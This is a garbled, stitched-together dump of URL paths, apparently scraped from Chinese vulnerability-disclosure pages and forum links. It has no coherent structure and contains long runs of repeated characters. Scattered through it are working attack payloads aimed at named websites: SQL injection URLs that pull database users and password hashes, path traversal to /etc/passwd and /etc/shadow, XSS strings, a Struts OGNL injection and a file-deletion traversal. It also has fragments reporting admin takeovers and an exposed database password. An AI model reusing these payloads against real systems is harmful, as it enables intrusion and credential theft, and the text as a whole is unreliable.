/detail/4042020?username=jiaqing5604128&bid=46&subject=鏉ュ緱鏃�&csrfToken=bec9291b-18a4-4e70-aa2d-520d8d1466e9&action=Delete&fileId=0&limit= /detail/4035865?username= /detail/4038512?username= /detail/4033928?username= /detail/4032825?username= /detail/4030539?username= /detail/4035884?username= /detail/4032547?username= /detail/4036422?username= /detail/4035865?username=鏉庢厱鐧�&bid=116&subject= /detail/4033928?username=闀块潚钘ょ紪杈�&bid=45&subject= /detail/4034764?username= /detail/4030539?username=s_dxding&bid= /detail/4038512?username=鐏北鍏堢敓&bid= /detail/4035884?username=閫�&bid=48&subject= /detail/4032825?username=nndmx&bid= /detail/4028273?username= /detail/4032547?username=鏉庢厱鐧�&bid=116&subject= /detail/4036422?username=razgriz&bid= /detail/4034764?username=wangjo731&bid= /detail/4030539?username=s_dxding&bid=57&subject= /detail/4033928?username=闀块潚钘ょ紪杈�&bid=45&subject=鍝堜經澶у鏁欐巿鏁欎綘鍐欒鏂�&csrfToken=393c8ecc-4f75-41e8-96df-299688dfbf1a&action= /detail/4038512?username=鐏北鍏堢敓&bid=51&subject= /detail/4035865?username=鏉庢厱鐧�&bid=116&subject=鍙f湇鎶楀嚌鑽�&csrfToken=c1edc834-f8cf-4be5-93b7-c413e7a74ef0&action= /detail/4032825?username=nndmx&bid=116&subject= /detail/4035884?username=閫�&bid=48&subject=A&csrfToken= /detail/4028273?username=boty&bid= /detail/4032547?username=鏉庢厱鐧�&bid=116&subject=stroke&csrfToken= /detail/4036422?username=razgriz&bid=57&subject= /detail/4033928?username=闀块潚钘ょ紪杈�&bid=45&subject=鍝堜經澶у鏁欐巿鏁欎綘鍐欒鏂�&csrfToken=393c8ecc-4f75-41e8-96df-299688dfbf1a&action=Delete&fileId= /detail/4032825?username=nndmx&bid=116&subject=Initial&csrfToken= /detail/4028273?username=boty&bid=48&subject= /detail/4035884?username=閫�&bid=48&subject=A&csrfToken=3154d315-ab47-4286-85ba-ab07a8ca0f38&action= /detail/4035865?username=鏉庢厱鐧�&bid=116&subject=鍙f湇鎶楀嚌鑽�&csrfToken=c1edc834-f8cf-4be5-93b7-c413e7a74ef0&action=Delete&fileId= /detail/4038512?username=鐏北鍏堢敓&bid=51&subject=楹婚唹鐞嗗康涓庡疄鏂�&csrfToken=279b54d9-2750-426b-9908-a294dd296294&action= /detail/4032547?username=鏉庢厱鐧�&bid=116&subject=stroke&csrfToken=195e49fa-e5bb-4f82-ba03-98842140f5c6&action= /detail/4034764?username=wangjo731&bid=238&subject= /detail/4030539?username=s_dxding&bid=57&subject=娣卞湷浣忛櫌鍖诲笀+闈㈣瘯鐪熼+鍙婄瓟妗�&csrfToken=e3f6c23d-54a6-40cb-8dac-5b67d0a3599d&action= /detail/4036422?username=razgriz&bid=57&subject=瀹夊窘鐪佺珛鍖婚櫌闆嗗洟2012灞婄澹渶姹傝〃&csrfToken= /detail/4033928?username=闀块潚钘ょ紪杈�&bid=45&subject=鍝堜經澶у鏁欐巿鏁欎綘鍐欒鏂�&csrfToken=393c8ecc-4f75-41e8-96df-299688dfbf1a&action=Delete&fileId=0&limit= /bbs/topic/22364469?done= /detail/4032825?username=nndmx&bid=116&subject=Initial&csrfToken=86bc9ac4-9984-402d-b814-84f076d94e6c&action= /detail/4035884?username=閫�&bid=48&subject=A&csrfToken=3154d315-ab47-4286-85ba-ab07a8ca0f38&action=Delete&fileId= /detail/4038512?username=鐏北鍏堢敓&bid=51&subject=楹婚唹鐞嗗康涓庡疄鏂�&csrfToken=279b54d9-2750-426b-9908-a294dd296294&action=Delete&fileId= /detail/4028273?username=boty&bid=48&subject=鍏ㄦ湰甯﹀瓧骞�&csrfToken=f6a08215-6cde-42ed-b95e-7e3dc571253b&action= /detail/4036422?username=razgriz&bid=57&subject=瀹夊窘鐪佺珛鍖婚櫌闆嗗洟2012灞婄澹渶姹傝〃&csrfToken=edef93da-2995-4d6b-9cec-ce636222c24e&action= /detail/4032547?username=鏉庢厱鐧�&bid=116&subject=stroke&csrfToken=195e49fa-e5bb-4f82-ba03-98842140f5c6&action=Delete&fileId= /detail/4034764?username=wangjo731&bid=238&subject=2011骞村叏鍥藉尰瀛﹀崥澹嫳璇粺鑰冪湡棰樺惉鍔�&csrfToken=4aaa2658-de0a-47f6-b509-354f772c75f0&action= /detail/4030539?username=s_dxding&bid=57&subject=娣卞湷浣忛櫌鍖诲笀+闈㈣瘯鐪熼+鍙婄瓟妗�&csrfToken=e3f6c23d-54a6-40cb-8dac-5b67d0a3599d&action=Delete&fileId= /detail/4035865?username=鏉庢厱鐧�&bid=116&subject=鍙f湇鎶楀嚌鑽�&csrfToken=c1edc834-f8cf-4be5-93b7-c413e7a74ef0&action=Delete&fileId=0&limit= /detail/4032825?username=nndmx&bid=116&subject=Initial&csrfToken=86bc9ac4-9984-402d-b814-84f076d94e6c&action=Delete&fileId= /detail/4038512?username=鐏北鍏堢敓&bid=51&subject=楹婚唹鐞嗗康涓庡疄鏂�&csrfToken=279b54d9-2750-426b-9908-a294dd296294&action=Delete&fileId=0&limit= /bbs/?bid= /detail/4035884?username=閫�&bid=48&subject=A&csrfToken=3154d315-ab47-4286-85ba-ab07a8ca0f38&action=Delete&fileId=0&limit= /detail/4028273?username=boty&bid=48&subject=鍏ㄦ湰甯﹀瓧骞�&csrfToken=f6a08215-6cde-42ed-b95e-7e3dc571253b&action=Delete&fileId= /detail/4030539?username=s_dxding&bid=57&subject=娣卞湷浣忛櫌鍖诲笀+闈㈣瘯鐪熼+鍙婄瓟妗�&csrfToken=e3f6c23d-54a6-40cb-8dac-5b67d0a3599d&action=Delete&fileId=0&limit= /detail/4034764?username=wangjo731&bid=238&subject=2011骞村叏鍥藉尰瀛﹀崥澹嫳璇粺鑰冪湡棰樺惉鍔�&csrfToken=4aaa2658-de0a-47f6-b509-354f772c75f0&action=Delete&fileId= /detail/4032547?username=鏉庢厱鐧�&bid=116&subject=stroke&csrfToken=195e49fa-e5bb-4f82-ba03-98842140f5c6&action=Delete&fileId=0&limit= /detail/4032825?username=nndmx&bid=116&subject=Initial&csrfToken=86bc9ac4-9984-402d-b814-84f076d94e6c&action=Delete&fileId=0&limit= /bbs/topic/22364469?done=/bbs/topic/22364469&ct= /bbs/topic/21945406?done= /detail/4036422?username=razgriz&bid=57&subject=瀹夊窘鐪佺珛鍖婚櫌闆嗗洟2012灞婄澹渶姹傝〃&csrfToken=edef93da-2995-4d6b-9cec-ce636222c24e&action=Delete&fileId= /bbs/?bid=15&done= /detail/4028273?username=boty&bid=48&subject=鍏ㄦ湰甯﹀瓧骞�&csrfToken=f6a08215-6cde-42ed-b95e-7e3dc571253b&action=Delete&fileId=0&limit= /detail/4034764?username=wangjo731&bid=238&subject=2011骞村叏鍥藉尰瀛﹀崥澹嫳璇粺鑰冪湡棰樺惉鍔�&csrfToken=4aaa2658-de0a-47f6-b509-354f772c75f0&action=Delete&fileId=0&limit= /detail/4036422?username=razgriz&bid=57&subject=瀹夊窘鐪佺珛鍖婚櫌闆嗗洟2012灞婄澹渶姹傝〃&csrfToken=edef93da-2995-4d6b-9cec-ce636222c24e&action=Delete&fileId=0&limit= /bbs/topic/21945406?done=/bbs/topic/21945406&ct= /bbs/?bid= /bbs/?bid=15&done=/bbs/post/page&ct= /bbs/topic/22329723?done= /bbs/?bid=57&done= /bbs/topic/22371336?done= /bbs/topic/22329723?done=/bbs/topic/22329723&ct= /bbs/topic/22371336?done=/bbs/topic/22371336&ct= /bbs/?bid=57&done=/bbs/post/page&ct= /bbs/topic/22369964?done= /bbs/topic/22369964?done=/bbs/topic/22369964&ct= /bbs/topic/22351661?done= /bbs/topic/22351661?done=/bbs/topic/22351661&ct= /bbs/topic/22363485?done= /bbs/topic/22366147?done= /bbs/topic/22363485?done=/bbs/topic/22363485&ct= /bbs/topic/22366147?done=/bbs/topic/22366147&ct= /bbs/topic/22372053?done= /bbs/topic/22350623?done= /bbs/topic/22340909?done= /bbs/topic/22350623?done=/bbs/topic/22350623&ct= /bbs/topic/22372053?done=/bbs/topic/22372053&ct= /bbs/topic/22342254?done= /bbs/topic/22340909?done=/bbs/topic/22340909&ct= /bbs/topic/22342254?done=/bbs/topic/22342254&ct= /bbs/topic/22347032?done= /bbs/topic/22347032?done=/bbs/topic/22347032&ct= /bbs/?bid= /bbs/topic/21945406?done= /bbs/?bid= /detail/4030788?username= /bbs/?bid=131&done= /bbs/topic/21945406?done=/bbs/topic/21945406&ct= /detail/4030788?username=shumufeng&bid= /bbs/?bid=50&done= /bbs/?bid= /bbs/?bid=131&done=/bbs/post/page&ct= /bbs/?bid=50&done=/bbs/post/page&ct= /detail/4030788?username=shumufeng&bid=116&subject= /bbs/?bid=51&done= /bbs/topic/22327657?done= /detail/4032111?username= /bbs/?bid=51&done=/bbs/post/page&ct= /detail/4032111?username=鏉庢厱鐧�&bid=116&subject= /bbs/topic/22327657?done=/bbs/topic/22327657&ct= /detail/4030788?username=shumufeng&bid=116&subject=ng-Term&csrfToken= /detail/4032111?username=鏉庢厱鐧�&bid=116&subject=AF&csrfToken= /bbs/?bid= /bbs/?bid= /bbs/?bid=89&done= /detail/4030788?username=shumufeng&bid=116&subject=ng-Term&csrfToken=e2d8c014-01fd-4a9f-acea-51d3278780f7&action= /detail/4032111?username=鏉庢厱鐧�&bid=116&subject=AF&csrfToken=f5eb1d11-c610-49d2-9e32-b357756bd682&action= /bbs/?bid=47&done= /bbs/?bid=89&done=/bbs/post/page&ct= /detail/4032111?username=鏉庢厱鐧�&bid=116&subject=AF&csrfToken=f5eb1d11-c610-49d2-9e32-b357756bd682&action=Delete&fileId= /detail/4030788?username=shumufeng&bid=116&subject=ng-Term&csrfToken=e2d8c014-01fd-4a9f-acea-51d3278780f7&action=Delete&fileId= /detail/4032111?username=鏉庢厱鐧�&bid=116&subject=AF&csrfToken=f5eb1d11-c610-49d2-9e32-b357756bd682&action=Delete&fileId=0&limit= /detail/4030788?username=shumufeng&bid=116&subject=ng-Term&csrfToken=e2d8c014-01fd-4a9f-acea-51d3278780f7&action=Delete&fileId=0&limit= /bbs/?bid= /bbs/?bid=47&done=/bbs/post/page&ct= /bbs/?bid=119&done= /bbs/topic/22308800?done= /bbs/topic/22287458?done= /bbs/topic/22285415?done= /bbs/topic/22269094?done= /bbs/topic/22268022?done= /bbs/topic/22230448?done= /bbs/topic/22265918?done= /bbs/topic/22245736?done= /bbs/?bid=119&done=/bbs/post/page&ct= /bbs/topic/22308800?done=/bbs/topic/22308800&ct= /bbs/topic/22268022?done=/bbs/topic/22268022&ct= /bbs/topic/22285415?done=/bbs/topic/22285415&ct= /bbs/topic/22287458?done=/bbs/topic/22287458&ct= /bbs/topic/22230448?done=/bbs/topic/22230448&ct= /bbs/topic/22265918?done=/bbs/topic/22265918&ct= /bbs/topic/22269094?done=/bbs/topic/22269094&ct= /bbs/topic/22245736?done=/bbs/topic/22245736&ct= /bbs/?bid= /bbs/topic/22346533?done= /common/下任意文件,还有http://www.shanxiwindow.net/common/或许还有其他的。 /zhaopin/list.php?q=&division=%E4%B8%80%E6%B7%98%2C%E6%B7%98%E5%AE%9D%E5%95%86%E5%9F%8E%2C%E6%B7%98%E5%AE%9D%E7%BD%91%2C%E8%81%9A%E5%88%92%E7%AE%97&location=%E6%9D%AD%E5%B7%9E%2C%E5%B9%BF%E5%B7%9E&fc=&sc=%E8%90%A5%E9%94%80%E7%AD%96%E5%88%92&tc=&type=&page=1 /litmap.php?coordx=121.549991&coordy=31.294436&cid=7245b21f-0def-46c5-9ab6-de0752f6d6c7 /litmap.php?coordx=121.549991&coordy=31.294436&cid=7245b21f-0def-46c5-9ab6-de0752f6d6c7 / /index.html /tomad/page/skype/home_button.html)其代码如下: /TomFlash.js /tomad/page/skype/SkypeAppS.js /skype/skype-main-bt.js /skype/skype-main-bt.js?'+Math.random()+ /CodeAward/pages/vildcode.aspx / /admin/admin_login.php /hy/08/ao01/manager/ /hy/08/jinyi/manager/ /hy/10/hs01/manager/ /catjojo/08/19z/manager/ /mj/hongxing/manager/ /catjojo/zf/ /xincheng/renmin/admin/login.asp /xincheng/lanzuan/admin/main.asp /xincheng/yulong/admin/login.asp /xincheng/shengjing/admin/login.asp /xincheng/qingshui/admin/login.asp /xincheng/jingdian/admin/login.asp /xincheng/yijing/admin/login.asp /xincheng/changdao/admin/login.asp /xincheng/gongguan/admin/login.asp /xincheng/lanzuan/admin/login.asp /xincheng/yihao/admin/login.asp /xincheng/renmin/admin/login.asp /xincheng/yihao/admin/login.asp /xincheng/shangdong/admin/login.asp /manager/news/manager.asp /hr/cgi-bin/admin/login.html /ad/zzk/vote/vote.asp?id=12 /manager/ /huchen/aoyuansell/shownews.asp?id=6 /myadmin/ /UserSmsInfo.aspx?ID=123123 /UserSmsInfo.aspx?ID=222222 /UserSmsInfo.aspx?ID=555555 /webcontroller?functionId=2613&lmid=LM000000001275 /sofprogecslive/1.jsp /upload/ /default/index.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa) /vulndb/15431 /advisories/32495/ /exploits/14360/ /MyStruts.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa) /viewvc?view=revision&revision=956389 /eWebEditor/admin_login.asp /session?username=%22%3E%3Cscript%3Ealert(%22%E8%80%81%E6%B4%9E%E8%BF%98%E6%B2%A1%E8%A1%A5%22)%3C/script%3E //manage/Modle/UploadFile/ListFiles.aspx / /1.txt /asp/zhaoping/oneseeker.asp?id=42443 /asp/zhaoping/oneseeker.asp?id=42443 /Asp/Home/Homefitment/FitmentDemand.asp?fitmentid=4526 /Asp/Home/Homefitment/FitmentDemand.asp?fitmentid=4526 / /tl/skill.php?id=402 /opta/live.php?id=f133588 /yh/card_product.php?id=70 /helen.jsp /2009/0909/wuliangye/article.php?id=58 /ScalB2CWeb/News/BottomNewText.aspx?code=NC00374 /loreal/s.php?id=111 /learning/read_art_sub.315.php?artid=38587%20and%201=2%20union%20select%201,2,3,4,user%28%29,6,7,8,9,0,1,2,3%23 /auto/read_art_sub.315.php?artid=37733%20and%201=2%20union%20select%201,2,3,4,concat%28user,0x7c,password,0x7c,host%29,6,7,8,9,0,1,2,3%20from%20mysql.user%23 /dragon/viewindex/radio/radio_cache.php?kindid=663 /dragon/admin/commend_list.php?start=50,1%23&classid=15 /crv_mediaReport.php?nid=440 /laofang/show.php?pid=192 /10086.zip /img/baidu_logo.gif /xss.js /website/news_content.php?id=322&type=1,此URL的ID字段由于没有对参数进行正确过滤,导致SQL注射漏洞 /purchase/InitCart.aspx?pid=10067402&pcount=1&ptype=1 /product/ProductIndex.aspx?startStr=C%27 /product/ProductIndex.aspx?startStr=C%27 /person/ /ExStepTwo/StepTwo/212021461664这个地址属于退货逻辑,后台调用http://returns.vancl.com/PublicHandlers/AddrAscx/Handler1.ashx?orderid=212021461664&target=defaultaddr,但是缺乏必要的权限验证,导致可以泄漏其他用户信息 /manage/ /manage/system-manage/initEditAdministratorAction.do?id=1 /manage/ /manage/ /was/portals/index.jsp /laofang/show.php?pid=192 /article.php?id=553 /votelist /special/hero56/ /trtxsqy/introduce_yc.php?id='%60%228rk1B /trtxsqy/introduce_yc.php?id='%60%228rk1B /) /1680241201/y9ZarqaHo /ph.asp /ph.asp /tp_sub.asp /tile/service/standard:orderDetailAsyncProxy.tile?outBizNo=201203188361200&bizIdentity=ttc10001 /enterRFD/gd/270 /enterRFD/gd/270 /enterRFD/gd/270%20and%20exists%28select%20name%20from%20sysobjects%29-- /aip_backup/RPT/inf_monthdata/HB_Datastation/AutoLoader.inibf mi:ss mi:ss yyyymmdd% yyyymmdd% yyyymmdd% nn:00;开始时间=00:00:00;结束时间=23:59:59;间隔=30;单位=天;}数据库设置={数据库类别=ORACLE;用户名=crm;密码=AEB3A4;服务器=ora11145;数据库=master;行数=1000;}SQL={select yyyymmdd% mi:ss mi:ss /aip_backup/RPT/DataStation/DataStation.log.bak /aip_backup/RPT/%E5%BD%A9%E9%93%83%E6%99%BA%E8%83%BD%E6%8A%A5%E8%A1%A8%E7%B3%BB%E7%BB%9F/INRPT%E6%99%BA%E8%83%BD%E6%8A%A5%E8%A1%A8%E5%B7%A5%E5%85%B7/INRPTV200R001D521/readme.txt /aip_backup/RPT/%E6%96%B0%E5%BB%BA%E6%96%87%E4%BB%B6%E5%A4%B9/sm_info_resource_zh.properties /aip_backup/PUSHDB31_20080709.sql /aip_backup/URP6/URP8100/Data/HelpFileIndex.ini /aip_backup/URP6/URP8100/onlinehelp/SoftX3000TOC.HHC /aip_backup/URP6/URP8100/onlinehelp/SoftX3000_TOC.IDX /mp3/color/color_download_new_2010-02-22.txt /aip_backup/RPT/%E6%99%BA%E8%83%BD%E6%8A%A5%E8%A1%A820070928/USDP%20REPORT%20V1%5B1%5D.0D11B40_INF_HBYD/USDP%20REPORT%20V1.0D11B40_INF_HBYD/%E5%AE%89%E8%A3%85%E5%8C%85/AutoLoader_init.txt /aip_backup/aip1/CC08/Services/MAINTAIN.LOG.DIR/MAINTAIN_LOG_Tues.TXT /aip_backup/RPT/%E6%99%BA%E8%83%BD%E6%8A%A5%E8%A1%A820070930/datastation_NEW/AutoLoader.ini /aip_backup/RPT/inf_monthdata/HB_Datastation/DataStation.htm /aip_backup/profile20080716.txt /aip_backup/URP6/URP8100/Data/CMD-EXAMPLE.txt /aip_backup/RPT/DataStation_dongheyan/DataStation/DataStation.log /aip_backup/RPT/DataStation_dongheyan/%E5%A4%8D%E4%BB%B6%20AutoLoader.ini /aip_backup/aip1/CC08/OnlineHelp/Document/LST%20LOG.htm /comment_ajax.html?id=2892 /ads/ /ads/20120229/starwood/.svn/entries /ads/20120229/ /adclog/WebServices/ /moa/ /moa/ /ADCCSSPortal/MainPage_IV/SI_agent.aspx /music.rar /en.rar /zongg/ /zongg/ /zongg/index.asp /zongg/index.asp /zongg/index.asp /zongg/index.asp /zongg/index.asp /zongg/index.asp /zongg/ /zongg/ /zongg/index.asp /zongg/index.asp /zongg/index.asp /zongg/index.asp /zongg/index.asp /zongg/index.asp /zongg/index.asp /admin/admin_login.php /p/2自动跳转到http://wap.taobao.com/channel/act/sale/zckj5.xhtml?ttid=b0zc37 /ag/sms/ready?url=http://map.baidu.com/&callback=abc /newslist.asp?newsid=201203151129101160 /newslist.asp?newsid=201203131747001080 /i?ct=503316480&z=0&tn=baiduimagedetail&word=【XSS /z/q208786176.htm /application/cms/article.php?catid=70 /content.php?id=422298注入点 /out/4//ksbnjs.jsp /goto_video/file_list.php /admin/ //ashx/getDepList.ashx?area=0571111 /user/resume.do?action=Download&resumeId=85391&resumeType=2 /dsb_zyyfw/wdtsg/wszxt/ /TrainQuery/autocomplete.do /coursecommentlist.aspx?id=51 /columncontentlist.aspx?id=48都存在注入 /log/20120317.txt /store/purchase/item /TR/xhtml1/DTD/xhtml1-transitional.dtd /1999/xhtml /store/purchase/item /manager/html /2j/news/mj.asp?AClassId=1&ANClassID=1&ID=100+and+@@version%3E0 /wzcx/lookup.aspx /?$=1910,(因为存在一些兼容问题,现在已经改成其他的了……) /$0000 /root@lcx.cc%3E,Holy /$1,返回结果: /$000000000000000000000000000000000000000000000000000000000000000000000000000000000000 /$000 /$=000 /$=00 /$1111111100000000,返回:/link%3E,Url /$%E5%B1%8C%E7%82%B8%EF%BC%81,返回: CF_Only_Open_Safe_URL,越来越接近真相了哦,亲~ /$%01%02%03%04%04%05%06%07%08%08%08%08%08%08%08%08%08%08%08%08%08%08 /$0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 /tr%20bkIndex=1%20bgColor=#fbfafa%20id=itemId_32%20onclick=SetCurSel(this)%20ondblclick%20='OnDbClickItem(this)'%20dCount=0 87AF538B-F052-4A0B-BAE0-E686AD921119'%20class=imgHead Head\1.png /tr 87AF538B-F052-4A0B-BAE0-E686AD921119 Head\1.png /$11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111 /$8888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888880 /items%3E%3Citem%20title=%22一个月未登录%22%20tips=%22该分组中一个月未登录好友%22%20value=%2231%22%20/%3E%3Citem%20title=%22三个月未登录%22%20tips=%22该分组中三个月未登录好友%22%20value=%2291%22%20/%3E%3Citem%20title=%22半年未登录%22%20tips=%22该分组中半年未登录好友%22%20value=%22184%22%20/%3E%3C/items%3E //A%3E%3C/font%3E%3Cfont%20style=%22font-size:20pt;font-family:'微软雅黑','MS%20Sans%20Serif',sans-serif;%22%20color='800040'%3E%3Cbr%3E%3Cbr%3E打开该链接……%3C/font%3E //A 20pt;font-family:'微软雅黑','MS Qzone_TipFrame_QzoneTipBack_clientBkg.png%22%20drawMode=%229Grid%2 Qzone_TipFrame_Q Qzone_TipFrame_QzoneTipBack_clientBkg.png Qzone_TipFrame_QzoneTipBack_clientBkg_hightlight.png /app/mail/login / /select.aspx /select.aspx?search=99999999 /manage/login.aspx www.vancl.com,把您要买的商品加入购物车。 /在购物车里就能找到你刚才加入的商品,这里先不使用礼品卡,以及任何操作,一直选择确认,直到下单订单成功!减去10元。 /domain/cer.net?IDDomain=11558213,可根据次路径后的数字变量切换不同的域名证书并打印下载下来,可根据此证书对客户进行社工,也可以用此域名证书对时代互联客服作为取回用户密码的凭证,并且不同地方的工信局可以根据域名证书注销域名备案,造成恶意注销他人备案。 / /order/GetOrderDetail/.mvc?orderid=orderid /php/,存在SQL注入,注入点为: /php/pages_tztg.php?wzid=5111,经过猜解,获得了后台管理员账号密码。通过后台http://www.hkjxj.gov.cn/admin/登入。 /defaultroot/public/jsp/multiupload.jsp?path=information&fileName=infoPicName&saveName=infoPicSaveName&tableName=infoPicTable&fileMaxSize=0&fileMaxNum=0&fileType=gif,jpg,bmp,jpeg,png&fileMinWidth=0&fileMinHeight=0&fileMaxWidth=0&fileMaxHeight=0 /daren/ /corp/view/vRPD_NewStockMeetingDetail.php?companycode=80198468 /.svn/text-base/SQLDao.jsp.svn-base /customer/userinfo.php?user=admin /ServiceAdmin/login.aspx //winners.591hx.com/SQ_hisJymx.aspx?u=sjh112630有漏洞,杳无音讯,今天查看漏洞已经补好了;再公布一个地址: /SQ_Fund_HisDisplaylog_new.aspx。。。这站很多漏洞噢,大家慢慢找吧,我这里收集几个 /cntv/login.php?session_key= /bug.php?action=view&id=5416。此EXP可激活此版本中的一句话后门。 /cgi-bin/quan_add_frnd /play.asp?id=2918 /index.php?id=5335&r=resource/show&vid=2 /admin.php /jsp/playershow/upswf.jsp?siteid=8 /article/730.htm /red/News_Text.php?class_id=3&id=1499 /lenovo/wsi/modules/driverdownload.aspx?searchtype=1 /fw.asp?id=34 /showtopic-135589.html /bbs/admin/ajax.aspx?AjaxTemplate=ajaxtopicinfo.ascx&poster=1 /bbs/admin/ajax.aspx?AjaxTemplate=ajaxtopicinfo.ascx&poster=1 /bbs/admin/ajax.aspx?AjaxTemplate=ajaxtopicinfo.ascx&poster=1 /bbs/tools/1.aspx /view/e79a88b265ce0508763213ed.html?l=2.1.1 /index.php/crowdtest/post/showPost/postId/8236/pageNum/0%22%3E%3Cimg%20src=1%20onerror=alert(1)%3E /netdisk/home /2011ahhjnd/getcomm.php?tid=-8 /book/catalog.php?book=195292 /.svn/text-base/SQLDao.jsp.svn-base /?q=node/18 /Public/Brief-IntroDuction-Show.asp?CourseId=25 /jinpaijiaolian/admin.php /volvo/admin.php?pwd=NKsNqNJbPxQHM9YK /bbs/robots.txt /sql/ /scripts/frontmaker/idmapdb.py / /user/createSmsCode/?mobile=手机号 /na/memberlist.php?org=123 /logon.jsp /left.jsp /flyingcity/admin/ /flyingcity/qzInfoAction/checkgsjj.action?id=2790 /modules.php?name=Downloads&d_op=viewdownload&cid=44%20and%201=1 /admin/index.html /admin/mes_admin.php?do=soft_up&id=408%20and%20user%3E0 /dlnew/accept_ver_new.php_bak / /config/config.ini /admin/index.html /upload/oday.php /download/pas$log.txt /phpinfo.php /dlarea_t/download_web.php?fn=../../../../../../etc/passwd&bid=3864&bname=%CD%A8%D3%C3%C7%F8&seid=1229&sename=Android&mid=1946%27&mname=Gpad&adv= /dlarea_t/download_web.php?fn=../global.php&bid=3864&bname=%CD%A8%D3%C3%C7%F8&seid=1229&sename=Android&mid=1946%27&mname=Gpad&adv= /dlxhtml/download.php?fn=../download/xx.php&bid=1&bname=%E9%80%9A%E7%94%A8%E5%8C%BA&mid=1919&mname=WM6.0%E5%8F%8A%E4%BB%A5%E4%B8%8A /manager/ /main/admin/adv_img.php /etc/shadow /main/dlquery_s.php?bid=3864&bname=%CD%A8%D3%C3%C7%F8&seid=1229&sename=Android&mid=1946&mname=Gpad&tyid=2705 /bbs/admin/ajaxlog.aspx?AjaxTemplate=ajaxtopicinfo.ascx&poster=1 /admin/ /home.do?sid=T_sILl5ehMU2xxEK2ThaGu&cp_config=2&from=6000202 /96333partner/love_ceo/answer.jsp?id=31%20and%201=2%20union%20select%201,2,3,4,5-- / /auto/cardb/dealer.php?action=DealerPic&seriesid=304&dealerid=1043%20and%201=2%20union%20select%201,user%28%29,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7%23 /auto/cardb/dealer.php?action=DealerInfo&dealerid=1218%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7%23 0A21AD68 0A21AD6E 0A21AD71 0A21AD73 0A21AD77 0A21AD79 0A21AD80 0A21AD83 0A21AD84 0A21AD88 0A21AD8C 0A21AD91 0A21AD92 0A21CC9B 0A21CCA1 0A21CCA5 0A21CCA7 0A21CCAB 0023:00000000= /na/memberlist.php?org=2%27union%20select%201,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15,16,17,18%20from%20information_schema.columns%20where%20table_schema=database%28%29%20%20/* /web/succmoney.aspx?id=2803681 /temp/201203281531479688022.jpg /photo/fldel.aspx?delpath=201203281531479688022.jpg /photo/fldel.aspx?delpath=../../xxxxxxxxx.aspx /Result.aspx?city=%BD%F0%BB%AA&type=25%0aor%0a1=1&key=s#main /Result.aspx?city=%BD%F0%BB%AA&type=25%0aor%0a1=2&key=s#main /ktv_new/in_ktvroom.aspx?serverid=4--&userid=%D3%CE%BF%CD12241428&search_type=1 /I_ADdata.aspx?bId=2-- /chatAreaN.aspx?chatZoneID=1&&hwnd=1573510-- /member/buybook/manage6/otherinfo/e06/daochudata/ /index.php?doc-summary-xxxxxxxxx%27 /install/install.php?lang=888888888888/ /account/repass.php /questions.php?action=more&m=1 /UserCenter/HisOrderDetails.aspx?OrderId=610000 /member/list.php?modelid=10 /space/?userid=1 